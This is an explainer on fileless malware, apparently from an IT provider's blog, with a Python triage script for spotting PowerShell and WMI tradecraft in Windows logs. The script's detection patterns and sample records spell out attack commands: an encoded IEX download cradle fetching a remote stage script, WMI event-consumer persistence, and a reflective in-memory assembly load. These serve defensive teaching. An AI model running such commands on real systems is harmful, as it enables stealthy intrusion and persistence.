Understanding Fileless Malware
Though fileless malware has been around for much longer, it only became a mainstream attack method in 2017. With fileless malware, attackers use legitimate tools that are already present on the target, such as installed software, built-in administrative utilities, and authorized protocols, to carry out malicious activity like unauthorized data retrieval or data destruction. Left unchecked, it can disrupt your business processes and the infrastructure that runs them.
What is fileless malware?
Fileless malware is malicious software that doesn't rely on dropping its own executable files to infect your infrastructure. Instead, it runs in your computer's memory (RAM) and abuses trusted, legitimate tools and features, such as Microsoft Office macros, PowerShell, and Windows Management Instrumentation (WMI).
It is far less visible than traditional malware. It uses a variety of techniques to stay persistent and can compromise the integrity of a business's processes and the infrastructure that runs them. Because there is no malicious file on disk to scan, fileless malware evades most anti-malware products, especially those that rely on signature databases of known threats. Automated sensors often cannot tell an illicit script from routine administration, because the same tools are used legitimately every day, and even analysts trained to spot such attacks frequently struggle to know where to look. The usual exception is persistence: a malicious scheduled task, registry run key, or WMI event subscription does leave a trace, and PowerShell script block logging records the text of scripts as they run, so those are the places to start looking.
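To make "where to look" concrete, here is an added example in Python (not code from the original article): a small triage routine that scans records shaped like Windows process-creation command lines and PowerShell script block log entries for the hallmarks of script-based, memory-resident tradecraft, such as encoded commands, download cradles, hidden windows, in-memory assembly loads, and WMI event subscriptions. It also decodes `-EncodedCommand` payloads (UTF-16LE inside base64) so the real script can be scored too. The records, their IDs, the indicator list, and the weights are all constructed for illustration and are not a vendor ruleset.

```python
"""Triage Windows script activity for fileless (living-off-the-land) tradecraft.

Added example, not from the original article. The input records are constructed
to look like the fields a SIEM carries for Security event 4688 (process creation
with command line) and PowerShell Operational event 4104 (script block logging).
The indicator list and weights are illustrative, not a vendor ruleset.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# -EncodedCommand (and its short forms) followed by a base64 blob of UTF-16LE text.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

# Phrases typical of script-based tradecraft, each with a weight. Any single hit is
# weak evidence on its own; admins use -NoProfile and Invoke-WebRequest every day.
INDICATORS: dict[str, tuple[re.Pattern[str], int]] = {
    "encoded_command": (ENC_RE, 3),
    "download_cradle": (re.compile(
        r"(?i)(Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadFile|\bIEX\b|Invoke-Expression)"), 2),
    "hidden_window": (re.compile(r"(?i)-(?:w|win|windowstyle)\s+hidden"), 1),
    "profile_or_policy_bypass": (re.compile(r"(?i)-(?:nop|noprofile|ep|executionpolicy)\b"), 1),
    "wmi_persistence": (re.compile(
        r"(?i)(__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding|Register-WmiEvent)"), 3),
    "in_memory_load": (re.compile(
        r"(?i)(\[System\.Reflection\.Assembly\]::Load|FromBase64String)"), 3),
}
THRESHOLD = 3  # combined weight at which a record is worth an analyst's time


@dataclass
class Finding:
    record_id: str
    score: int
    reasons: list[str]
    decoded: str | None  # plaintext recovered from -EncodedCommand, if any


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text: str) -> str | None:
    """Return the plaintext behind an -EncodedCommand argument, or None if there is none."""
    match = ENC_RE.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def score_record(record_id: str, text: str) -> Finding:
    """Score one command line or script block, scanning the decoded payload as well."""
    decoded = decode_encoded_command(text)
    views = [text] + ([decoded] if decoded else [])
    reasons, score = [], 0
    for name, (pattern, weight) in INDICATORS.items():
        if any(pattern.search(view) for view in views):
            reasons.append(name)
            score += weight
    return Finding(record_id, score, reasons, decoded)


def triage(records: list[tuple[str, str, str]]) -> list[Finding]:
    """Return findings at or above THRESHOLD, highest score first."""
    findings = [score_record(rid, text) for rid, _source, text in records]
    return sorted((f for f in findings if f.score >= THRESHOLD), key=lambda f: -f.score)


def sample_records() -> list[tuple[str, str, str]]:
    """Constructed records: (id, log source, command line or script block text)."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
    return [
        # Routine administration: one weak indicator, stays below the threshold.
        ("r1", "4688", "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq 'Running'\""),
        # Hidden, policy-bypassing launcher whose real payload is inside -enc.
        ("r2", "4688", "powershell.exe -nop -w hidden -ep bypass -enc " + encode_command(cradle)),
        # Script block registering a WMI permanent event consumer for persistence.
        ("r3", "4104", r"Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer "
                       r"-Arguments @{Name='Updater'; CommandLineTemplate='powershell.exe -nop -w hidden -enc <base64>'}"),
        # Script block loading a .NET assembly straight from memory, never touching disk.
        ("r4", "4104", "$asm = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob)); "
                       "$asm.EntryPoint.Invoke($null, $null)"),
    ]


if __name__ == "__main__":
    for finding in triage(sample_records()):
        print(f"{finding.record_id}: score={finding.score} reasons={finding.reasons}")
        if finding.decoded:
            print(f"    decoded: {finding.decoded}")
```

The point of the weighting is the benign record: a lone `-NoProfile` is what administrators type all day, so it scores 1 and is ignored, while the combination of a hidden window, a policy bypass and an encoded download cradle scores 7. Feeding the decoded payload back through the same patterns is what turns an opaque base64 blob into a readable indicator; without script block logging or command-line auditing enabled, none of these records would exist to scan.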
What potential damage can it do?
If it is not detected and removed, fileless malware can do a lot of damage to business systems, such as:
- Steal or destroy data
- Modify files without authorization
- Act as a backdoor for other types of malware
- Cause system crashes and instability
- Disrupt normal operations by taking up CPU time or memory
Frequently cited examples of high-profile attacks that relied on fileless techniques include the 2016 Democratic National Committee hack and the 2017 Equifax data breach.
How big of a threat is it?
Cybersecurity provider WatchGuard Technologies' Internet Security Report for Q4 2020 found that fileless malware attacks in 2020 were up 888% over 2019. Worse still, its Q2 2021 report found that, only halfway through 2021, detections originating from scripting engines such as PowerShell had already reached 80% of 2020's total script-initiated attack volume.
How can you defend against fileless malware?
Your business should practice defense in depth, implementing multiple safeguards that reduce exposure and limit damage. These include keeping systems patched, enforcing least privilege for user accounts, cultivating a security-aware workforce, and deploying security tools that analyze behavior rather than only file signatures. Because fileless attacks run through built-in tooling, also turn on the telemetry that makes them visible: PowerShell script block and module logging, and process creation auditing with command lines. Where possible, restrict Office macros and constrain PowerShell with application control and Constrained Language Mode. Lastly, partner with a managed IT services provider that offers 24/7 network monitoring, security audits, and penetration testing. Contact us today to get started.